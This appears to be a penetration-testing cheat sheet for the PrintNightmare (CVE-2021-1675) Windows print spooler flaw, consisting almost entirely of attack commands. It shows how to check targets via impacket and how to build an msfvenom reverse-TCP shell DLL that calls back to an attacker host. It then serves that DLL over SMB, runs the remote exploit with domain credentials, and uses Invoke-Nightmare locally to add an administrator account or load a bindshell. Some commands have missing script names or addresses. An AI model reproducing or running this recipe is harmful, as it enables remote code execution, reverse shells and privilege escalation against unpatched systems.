CVE-2021-1675 - PrintNightmare

To check if it's vulnerable,

Using impackets, @ | egrep 'MS-RPRN|MS-PAR'

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

Remote exploitation,

Generate a dll,

msfvenom -p windows/shell/reverse_tcp LHOST=`x` LPORT=443 -f dll > shell.dll

Serve the dll with smbserver

impacket-smbserver -debug morph3 . -smb2support

Exploiting it,

./ hackit.local/domain_user:Pass123@ '\\\smb\addCube.dll'
./ hackit.local/domain_user:Pass123@ 'C:\addCube.dll'

Local exploitation,

Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"


Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default 

Last updated